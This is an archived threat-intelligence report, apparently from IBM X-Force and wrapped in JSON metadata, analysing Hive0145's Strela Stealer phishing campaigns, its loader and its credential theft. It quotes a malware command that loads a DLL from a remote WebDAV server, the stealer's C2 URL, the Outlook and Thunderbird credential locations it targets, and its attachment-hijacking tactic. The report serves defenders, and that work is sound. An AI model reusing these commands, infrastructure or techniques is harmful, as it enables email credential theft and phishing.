{ "id": "3d779710-20e8-4c27-87e9-12230aa0ff31", "created_at": "2026-04-06T00:08:09.928716Z", "updated_at": "2026-04-10T13:11:35.709091Z", "deleted_at": null, "sha1_hash": "c0026383e30c37d209075632d7ea6b28ce4285b9", "title": "Strela Stealer Today's Invoice Tomorrow’s Phish", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 9994831, "plain_text": "Strela Stealer Today's Invoice Tomorrow’s Phish\r\nBy Golo Mühr, Joe Fasulo, Charlotte Hammond\r\nPublished: 2024-11-12 · Archived: 2026-04-05 17:23:17 UTC\r\nCharlotte Hammond\r\nMalware Reverse Engineer\r\nIBM Security\r\nAs of November 2024, IBM X-Force has tracked ongoing Hive0145 campaigns delivering Strela Stealer malware\r\nto victims throughout Europe – primarily Spain, Germany and Ukraine. The phishing emails used in these\r\ncampaigns are real invoice notifications, which have been stolen through previously exfiltrated email credentials.\r\nStrela Stealer is designed to extract user credentials stored in Microsoft Outlook and Mozilla Thunderbird. During\r\nthe past 18 months, the group tested various techniques to enhance its operation’s effectiveness. Hive0145 is likely\r\nto be a financially motivated initial access broker (IAB), active since late 2022 and potentially the sole operator of\r\nStrela Stealer. The continuous operational pace of Hive0145’s campaigns highlights an increased risk to potential\r\nvictims across Europe.\r\nKey findings:\r\nHive0145 is an initial access broker focused on targeting victims throughout Europe\r\nDuring the last 18 months, Strela Stealer has tested out a variety of techniques to improve its infection\r\nchain and extract email credentials\r\nAs of July 2024, Hive0145 began using stolen emails to further spread Strela Stealer\r\nHive0145 campaigns have increased in volume, with weekly campaigns as of 17 October 2024\r\nAs of early November 2024, Hive0145 began targeting Ukraine with stolen invoice emails\r\nHive0145 is potentially the sole operator of Strela Stealer\r\nThe latest tech news, backed by expert insights\r\nStay up to date on the most important—and intriguing—industry trends on AI, automation, data and beyond with\r\nthe Think Newsletter, delivered twice weekly. See the IBM Privacy Statement.\r\nBackground\r\nStarting mid-April 2023, X-Force began tracking an increase in Hive0145 activity. Hive0145 is likely a financially\r\nmotivated initial access broker (IAB) and potentially the sole operator of Strela Stealer. Strela Stealer is\r\na malware designed to extract user email credentials stored in Microsoft Outlook and Mozilla Thunderbird,\r\npotentially leading to Business Email Compromise (BEC). IABs routinely gather credentials and other data that is\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 1 of 20\n\nsold to affiliate threat actors specializing in victim network exploitation. However, it remains unknown if\r\nHive0145 has a specific partner network for selling the access gained through their campaigns.\r\nOver the past year, Hive0145 has demonstrated proficiency in evolving tactics, techniques and procedures (TTPs)\r\nto target victims across Europe. Italian, Spanish, German and Ukrainian victims continue to receive weaponized\r\nattachments that entice the victim to open the file. The actor’s campaigns present the victim with fake invoices or\r\nreceipts and often a short, generic message of urgency for victims to address. Upon loading the attached file, the\r\nvictim unwittingly executes the infection chain leading to Strela Stealer malware.\r\nFigure 1 Banco Santander-themed email campaign\r\nHive0145 continued this pattern of using generic messages and fake invoices and receipts throughout the first half\r\nof 2024. However, by early July 2024, the group adopted a different approach and began weaponizing stolen\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 2 of 20\n\nemails of actual entities across financial, technology, manufacturing, media, e-commerce and other industries. The\r\ndeparture in simplicity indicates Hive0145’s shift in a maturing cyber operations capability.\r\nAttachment hijacking\r\nIn July 2024, X-Force observed a mid-campaign change in the emails being distributed by Hive0145, with the\r\nshort and generic messages being replaced with what appeared to be legitimate stolen emails. The phishing emails\r\nexactly matched official invoice communication emails and, in some cases, still directly addressed the original\r\nrecipients by name. X-Force was able to verify that the emails were in fact authentic invoice notifications from a\r\nvariety of entities across financial, technology, manufacturing, media, e-commerce and other industries. It is likely\r\nthat the group sourced the emails through previously exfiltrated credentials from their prior campaigns.\r\nThe concept of using stolen emails is not new, it was used extensively by the Emotet group and malware\r\ndistributors such as Hive0118 (aka TA577), TA551 and TA570. In their campaigns, they leveraged thread\r\nhijacking, where new threads to stolen emails were used as a way to increase the appearance of legitimacy. The\r\nmodified emails were sent to corresponding contacts of previous victims, making the final email look like a reply\r\nto the stolen email, thereby hijacking the email thread. The text the distributors add to the emails is often short\r\nreplies, urging victims to look at the included attachments or URLs.\r\nThe technique employed by Hive0145 differs from thread-hijacking in that rather than adding a reply message to\r\nthe stolen email, the original contents remain largely unmodified and only the attachment is switched to include a\r\nmalicious payload using the original filename (without the original extension). Within the email body, Hive0145\r\nalso replaces both the local part and the domain of the original email sender with that of the new phishing victim\r\nto custom-tailor the email. The emails with hijacked attachments are then sent out in mass phishing campaigns.\r\nHive0145 also appears to carefully consider the hijacked emails by only selecting ones referring to invoices and\r\ncontaining attachments. X-Force has observed the attachment hijacking technique since mid-2024 in campaigns\r\ntargeting German, Spanish and Ukrainian speakers.\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 3 of 20\n\nFigure 2 Example of original stolen email of a Deutsche Bahn invoice with hijacked attachment\r\nLate 2024 campaign\r\nThe July 2024 campaign began to reveal low volumes of email delivery throughout the week of 8 July. Hive0145\r\nappeared to take a short break before returning with a larger campaign the week of 22 July, followed by a period\r\nof inactivity. Starting mid-October 2024, Hive0145 returned with a widespread attachment hijacking campaign\r\ntargeting Spanish, German and Ukrainian victims. Unlike the brief July campaign, this one has continued sending\r\nout notable volumes of emails with the majority sent during weekdays.\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 4 of 20\n\nFigure 3 The ongoing late-October 2024 campaign\r\nEmails stolen across financial, technology, manufacturing, media, e-commerce and other industries continue to be\r\nweaponized as of early November 2024, in one of the largest observed Hive0145 campaigns to date. In the\r\nongoing campaign, the victim receives an archive containing a heavily obfuscated JavaScript file that downloads\r\nand executes a crypted Strela Stealer DLL. As of 7 November 2024, Hive0145 is including Ukrainian speakers in\r\nthe ongoing campaign signaling a significant development compared to previously observed victimology.\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 5 of 20\n\nFigure 4 Example of the original stolen email of an invoice targeting Ukraine\r\nHive0145’s increased volume of delivery using attachment hijacking with a steady supply of freshly stolen emails\r\nmay suggest the group has adopted automation for harvesting, weaponizing, packaging and sending their phishing\r\nemails. The group continues to show a preference for widespread exploitation of Spanish, German and Ukrainian\r\nvictims throughout Europe.\r\nEvolving techniques\r\nHive0145 stands out among other malware distributors for their level of effort to adopt increasingly sophisticated\r\nmethods of delivering Strela Stealer. The level of sophistication reflects on other successful mass distributors of\r\nmalware such as Emotet, Pikabot and Qakbot, which often led to the deployment of ransomware. Below is a\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 6 of 20\n\nbreakdown of notable techniques used by Hive0145 over time, with some being briefly tested and others fully\r\nadopted.\r\nPolyglots\r\nThe first Strela Stealer campaigns observed by X-Force made use of polyglot files, as first reported in a blog by\r\nDCSO (Deutsche Cyber-Sicherheitsorganisation) in late 2022. These files have multiple valid formats and can be\r\nparsed by different applications. The same file could be rendered as both HTML to display a decoy invoice as well\r\nas be a valid DLL, implementing Strela Stealer. This is a rather uncommon technique for attempting to bypass\r\nsecurity solutions.\r\nSigned binaries\r\nMultiple campaigns throughout 2023 made use of valid code signing certificates for the malicious Strela Stealer\r\nbinaries. For example, campaigns targeting Spanish-speaking victims dating back to April 2023 contained\r\npayloads with a valid certificate signed by Tecfinance Informatica E Projetos De Sistemas Ltda, a software\r\ncompany in Brazil.\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 7 of 20\n\nFigure 5 Brazilian company certificate used in 2023 campaigns\r\nOn 5 May 2024, X-Force took steps to inform relevant parties of the finding, and the certificate has since been\r\nrevoked.\r\nOf note, a mid-2023 Italy-targeted campaign used a different certificate:\r\nFigure 6 Another stolen certificate used in mid-2023 to target Italian victims\r\nTargeted phishing\r\nStrela Stealer phishing campaigns also tailored filenames to include targeted domain names. The file names are\r\noften identical to the name of the organization or company, potentially in an attempt to generate authenticity. The\r\nexample below is a phishing email from 2023 posing as an invoice or payment receipt.\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 8 of 20\n\nFigure 7 Factura-themed email campaign\r\nAs the email suggests, the attachments are encrypted ZIP files, with passwords slightly differing between every\r\nemail. Threat actors encrypt email attachments since basic email filtering and sandbox solutions often cannot\r\ninspect or detonate those files.\r\nStrela Stealer has also used uncommon extensions for their PE executable files such as .com instead of .exe:\r\ntransferencia_\u003cdomain_name\u003e.com\r\nfactura_\u003cdomain_name\u003e.com\r\nFATTURA_\u003cdomain_name\u003e.bat.exe\r\nThis makes use of a condition in Microsoft Windows operating systems where three different extensions can be\r\nused to mark a file as executable: .exe, .com, and .pif.\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 9 of 20\n\nIf the content is an executable PE file, Microsoft Windows will run it automatically once opened. By using the\r\nmore uncommon and unknown extensions, the campaign may evade simple anti-virus solutions or victim\r\nsuspicion. Earlier campaigns with the same payloads were also observed to make use of the .pif extension.\r\nPacking, obfuscation and crypting\r\nApart from directly attached ZIP archives with the malicious executables, Strela Stealer campaigns also often use\r\nobfuscated scripts such as Batch, JavaScript or PowerShell to download or drop their payload.\r\nCampaigns throughout 2024 mainly relied on these obfuscated scripts to run a PowerShell command to connect to\r\na WebDAV server and download and execute a crypted DLL:\r\n\"C:\\Windows\\system32\\rundll32.exe\"\r\n\\\\94.159.113.48@8888\\davwwwroot\\157161090119030.dll,Entry\r\nThe WebDAV staging servers host a large number of DLLs, with different names and hashes. They appear to have\r\nbeen built using a crypter X-Force identifies as “Stellar Crypter,” which has likely been in use exclusively by\r\nHive0145 since at least May 2023. The malicious binaries identified as “Stellar Loader” contain the encrypted\r\nStrela Stealer payload.\r\nStellar Loader\r\nStellar Loader is a crypter that has been in use since at least April 2023 and is predominantly a precursor to follow\r\non Strela Stealer payloads. Stellar samples are usually highly obfuscated and make use of techniques such as\r\ncontrol flow obfuscation and include large amounts of junk instructions to hinder analysis and signature creation.\r\nStellar’s payload is XOR encrypted and stored in the .data section of the Stellar loader binary. The encrypted\r\npayload data is preceded by the XOR key which, in recent samples, consists solely of upper and lowercase letters\r\nand can be thousands of characters long.\r\nUpon execution, Stellar Loader decrypts the payload data using XOR and the stored key. The decryption process\r\nmay also involve an additional round of XOR using a hardcoded single-byte key. As part of the Stellar Loader\r\ncode’s obfuscation, the decryption algorithm within the code is often expanded to include hundreds of operations.\r\nHowever, the vast majority of these operations cancel each other out, and what appears as a complex algorithm\r\ncan be reduced down to a simple XOR operation. The screenshot below shows a version of Stellar Loader with\r\nminimal obfuscation, where the structure of the loader code and decryption algorithm can be easily seen.\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 10 of 20\n\nIn more recent versions of the loader, the encrypted payload data is followed by an additional encrypted block\r\ncontaining a list of API names required by the loader code, such as VirtualAlloc. The loader decrypts this block\r\nusing the same key as the payload but without the additional single-byte XOR. The loader can then use the API\r\nnames in the block to retrieve the corresponding API addresses.\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 11 of 20\n\nOnce the payload and API list have been decrypted, Stellar allocates space in memory using VirtualAlloc and\r\nmaps the payload PE at the allocated address. It then performs the standard PE loading steps, such as loading its\r\nimports and processing any relocation sections (.relocs), and finally, it executes the payload at its entry point\r\naddress.\r\nStrela Stealer\r\nStrela Stealer changed little in functionality over the past two years. Starting with the initial version reported on by\r\nDCSO in late 2022, the main objective of the stealer is to exfiltrate email credentials from two common email\r\nclients: Microsoft Outlook and Thunderbird. This is consistent across all variants, however, the latest variant does\r\nsupport more registry keys to search for Microsoft Outlook credentials than prior versions.\r\nStrela Stealer runs two functions tasked with stealing credentials from two email clients:\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 12 of 20\n\nEmail\r\nclient\r\nThunderbird Microsoft Outlook\r\nLocation File system Registry\r\nPath\r\n%APPDATA%\r\n\\Thunderbird\r\n\\Profiles\r\n\\logins.\r\njson\r\n%APPDATA%\r\n\\Thunderbird\r\n\\Profiles\r\n\\key4.\r\ndb\r\n SOFTWARE\\\\Microsoft\\\\Office\\\\16.0\\\\Outlook\\\\Profiles\\\\Outlook\\\\\r\n 9375CFF0413111d3B88A00104B2A6676\\\\\r\n SOFTWARE\\\\Microsoft\\\\Office\\\\15.0\\\\Outlook\\\\Profiles\\\\Outlook\\\\\r\n 9375CFF0413111d3B88A00104B2A6676\\\\\r\n Software\\\\Microsoft\\\\Windows Messaging \r\n Subsystem\\\\Profiles\\\\9375CFF0413111d3B88A00104B2A6676\r\n Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows \r\n MessagingSubsystem\\\\Profiles\\\\Outlook\\\\\r\n 9375CFF0413111d3B88A00104B2A6676\r\nFor Outlook, Strela Stealer specifically looks for the registry values:\r\nIMAP Server\r\nIMAP User\r\nIMAP Password – decrypted using CryptUnprotectData()\r\nThe data is formatted and prepended with the string “FF” or “OL” for Thunderbird data and Outlook data,\r\nrespectively. Next, it is also encrypted with a static XOR key, which represents a GUID string such as:\r\n96be98b2-8a00-410d-87da-2482cc8b7793  \r\nThen, Strela Stealer sends a POST request for each email client to its hardcoded C2 server:\r\nhttp://94.159.113[.]48/server.php\r\nThe response is decrypted via the same XOR key above. Strela Stealer continues to send out POST requests in 1-\r\nsecond intervals until a request fails or it receives back the string “KH” (2023 versions), “ANTIROK” (2024\r\nversions) or “CHOLLIMA” (Nov. 2024 versions).\r\nAs of October 2024, Strela Stealer also includes two more exfiltration functions. The first gathers system\r\ninformation on the host and writes it to a file via the command:\r\ncmd.exe /c systeminfo \u003e %TMP%\\{\u003cvolume_guid_of_system_folder\u003e}s.txt\r\nThe second exfiltration function uses COM objects to enumerate the list of installed applications from the\r\n“AppsFolder” (a virtual folder, displayed as “Applications”) on the victim machine.\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 13 of 20\n\nThe dropped file, as well as the list of installed applications, are read and encrypted before exfiltration in the same\r\nfashion as the others. They are sent to the C2 server with identifiers “SI” and “LA” respectively.\r\nLanguage checks\r\nStrela Stealer started to implement language checks by verifying the keyboard language on the victim host.\r\nVersions throughout 2024 only run on hosts with one of the following keyboard languages:\r\nSpanish\r\nGerman\r\nCatalan\r\nPolish\r\nItalian\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 14 of 20\n\nBasque\r\nIn early November, Hive0145 started distributing stolen Ukrainian emails as well and modified the language\r\nverification logic slightly, adding Ukrainian (0x422) to the list of keyboard layouts. In addition, the developers\r\nswitched to using the GetKeyboardLayoutList API to cover all installed keyboard layouts. If none of the languages\r\nmatch, Strela Stealer has a secondary check comparing the result of the user’s default locale\r\nfrom GetLocaleInfoA against “AU” and “UA”, which are the codes for Australia and Ukraine. It is possible that\r\nthe developer was not sure of the endianness of the returned value and did not intend to target Australia. Overall,\r\nthese changes increase the scope of machines available for a Strela Stealer infection.\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 15 of 20\n\nPreviously the malware would display an unobtrusive error message to the user after running in order to not raise\r\nany suspicion. It states that the file was corrupted and not able to be opened, in the language depending on the\r\ninstalled keyboard. The latest versions use the more universal error message “Err 100”, which is shown after 5\r\nseconds from the beginning of execution.\r\n.NET variant\r\nIn June 2023, X-Force observed a single Italy-targeted Hive0145 campaign delivering a new Strela Stealer variant\r\nthat was completely rewritten in .NET. Similar to campaigns before it also made use of valid code signing\r\ncertificates. Re-implementing malware in a different language shows a significant effort by the threat actor. In\r\norder to conceal strings, function names and control flow, the developers made use of the commercial “Aldaray\r\nRummage Obfuscator” for .NET. The screenshot below shows the code used to access and unprotect IMAP\r\ncredentials from Microsoft Outlook registry keys.\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 16 of 20\n\nNotably, the commercial obfuscator does include a watermark for the license, which was observed as:\r\nRummage is licensed to Victoria Semigodova (issue J) for use with any product.\r\n5687c5da50660eda\r\nThe sample above displays the following error message in Italian:\r\nIl file viene arrestato e non può essere eseguito.\r\nHive0145 objectives\r\nHive0145’s focus on harvesting email credentials sets them apart from other operators of stealer or botnet\r\nmalware, which are often commoditized and target a broader range of credentials and data, or facilitate follow-on\r\npayloads intended for initial access. Hive0145’s use of stolen emails for attachment hijacking is an indicator that a\r\nportion of stolen email credentials may be used to harvest legitimate emails for further distribution. Both stolen\r\nand actor-created emails used by Hive0145 predominantly feature invoices as themes, which points towards\r\npotential financial motivation. It is possible that Hive0145 may sell stolen emails to affiliate partners for the\r\npurposes of further business email compromise.\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 17 of 20\n\nConclusion:\r\nHive0145 is a rapidly maturing cyber criminal threat actor and seeks to infect victims with the intention of gaining\r\nvalid email credentials. Observations suggest that the theft of email credentials, through initial campaigns, led to\r\nfurther theft of valid emails used in subsequent attachment hijacking campaigns. Stela Stealer malware continues\r\nto be an effective tool for Hive0145 to extract email credentials.\r\nThe wide variety of industries emulated by Hive0145’s email campaigns increases the potential risk of being\r\ntargeted for commercial organizations throughout Europe. Of note, organizations in Italian, Spanish, German, or\r\nUkrainian-speaking regions may be at more immediate risk of a Hive0145 campaign. X-Force recommends\r\nheightened vigilance surrounding email attachments received and careful review of the expected file type\r\ndelivered.\r\nRecommendations:\r\nX-Force recommends organizations:\r\nExercise caution with emails and ZIP archive attachments\r\nConsider changing the default application for Javascript/JScript/VBScript files to Notepad\r\nMonitor rundll32.exe processes executing remotely hosted DLLs\r\nInstall and configure endpoint security software\r\nUpdate relevant network security monitoring rules\r\nEducate staff on the potential threats to the organization\r\nScroll to view full table\r\nIndicator Indicator Type Context\r\n03853c56bcfdf87d71ba\r\n4e17c4f6b55f989edb29fc1\r\ndb2c82de3d50be99d7311\r\nSHA256 Stellar Loader (Oct 2024)\r\ne50bea80513116a1988822\r\nfe02538d3af4d91505d409\r\n8afca4ea741bcf4cd427 \r\nSHA256 Stellar Loader (May 2024)\r\n2cac42735170cd3f67111807\r\na7e48f8fca104eb97c379129\r\n872249160d90e22d\r\nSHA256 Stellar Loader - minimal obfuscation (Jan 2024)\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 18 of 20\n\n9a032497b82c3db8146cb6\r\n24b369f63bef76b302a5e25\r\n349156bdcb53af3fb84\r\nSHA256 Strela Stealer payload\r\ne4a7ad38aaea4bd27c32c57\r\nb5a52eac1020495cf8698a2b\r\n595b169a3c5c9313a\r\nSHA256 Strela Stealer payload\r\n2f7ac330e100b577748bb34\r\nbd8f7f655f6d138b90683594\r\ndbf06ccc41bb3751a\r\nSHA256 Stellar Loader (Nov 2024)\r\n94.159.113[.]48 IPv4 Strela Stealer C2\r\n94.159.113[.]86 IPv4 Strela Stealer C2\r\n193.109.85[.]231 IPv4 Strela Stealer C2\r\n5906c8e683b8eb9d2bc104f\r\n3ca7abaa1f76c64ac694c46a\r\n0de5ec67456364f5d\r\nSHA256 Strela Stealer .NET variant\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 19 of 20\n\nSource: https://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 20 of 20\n\n595b169a3c5c9313a 2f7ac330e100b577748bb34 \nbd8f7f655f6d138b90683594 SHA256 Stellar Loader (Nov 2024)\ndbf06ccc41bb3751a \n94.159.113[.]48 IPv4 Strela Stealer C2\n94.159.113[.]86 IPv4 Strela Stealer C2\n193.109.85[.]231 IPv4 Strela Stealer C2\n5906c8e683b8eb9d2bc104f \n3ca7abaa1f76c64ac694c46a SHA256 Strela Stealer .NET variant\n0de5ec67456364f5d \n Page 19 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY" ], "origins": [ "web" ], "references": [ "https://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish" ], "report_names": [ "strela-stealer-todays-invoice-tomorrows-phish" ], "threat_actors": [ { "id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f", "created_at": "2022-10-25T15:50:23.579601Z", "updated_at": "2026-04-10T02:00:05.360509Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "TA551", "GOLD CABIN", "Shathak" ], "source_name": "MITRE:TA551", "tools": [ "QakBot", "IcedID", "Valak", "Ursnif" ], "source_id": "MITRE", "reports": null }, { "id": "28349be5-ce76-4a45-9502-707953dd2f07", "created_at": "2025-05-29T02:00:03.210059Z", "updated_at": "2026-04-10T02:00:03.86427Z", "deleted_at": null, "main_name": "HIVE-0145", "aliases": [ "Hive0145" ], "source_name": "MISPGALAXY:HIVE-0145", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "40b623c7-b621-48db-b55b-dd4f6746fbc6", "created_at": "2024-06-19T02:03:08.017681Z", "updated_at": "2026-04-10T02:00:03.665818Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shathak", "TA551 " ], "source_name": "Secureworks:GOLD CABIN", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "90f216f2-4897-46fc-bb76-3acae9d112ca", "created_at": "2023-01-06T13:46:39.248936Z", "updated_at": "2026-04-10T02:00:03.260122Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shakthak", "TA551", "ATK236", "G0127", "Monster Libra" ], "source_name": "MISPGALAXY:GOLD CABIN", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "96d5b301-0872-444c-ba32-eecf7a9241c0", "created_at": "2023-02-15T02:01:49.560566Z", "updated_at": "2026-04-10T02:00:03.347926Z", "deleted_at": null, "main_name": "TA570", "aliases": [ "DEV-0450" ], "source_name": "MISPGALAXY:TA570", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b4f83fef-38ee-4228-9d27-dde8afece1cb", "created_at": "2023-02-15T02:01:49.569611Z", "updated_at": "2026-04-10T02:00:03.351659Z", "deleted_at": null, "main_name": "TA577", "aliases": [ "Hive0118" ], "source_name": "MISPGALAXY:TA577", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "22d450bb-fc7a-42af-9430-08887f0abf9f", "created_at": "2024-11-01T02:00:52.560354Z", "updated_at": "2026-04-10T02:00:05.276856Z", "deleted_at": null, "main_name": "TA577", "aliases": [ "TA577" ], "source_name": "MITRE:TA577", "tools": [ "Pikabot", "QakBot", "Latrodectus" ], "source_id": "MITRE", "reports": null }, { "id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68", "created_at": "2022-10-25T16:07:24.578896Z", "updated_at": "2026-04-10T02:00:05.039955Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "G0127", "Gold Cabin", "Monster Libra", "Shathak", "TA551" ], "source_name": "ETDA:TA551", "tools": [ "BokBot", "CRM", "Gozi", "Gozi CRM", "IceID", "IcedID", "Papras", "Snifula", "Ursnif", "Valak", "Valek" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434089, "ts_updated_at": 1775826695, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c0026383e30c37d209075632d7ea6b28ce4285b9.pdf", "text": "https://archive.orkl.eu/c0026383e30c37d209075632d7ea6b28ce4285b9.txt", "img": "https://archive.orkl.eu/c0026383e30c37d209075632d7ea6b28ce4285b9.jpg" } }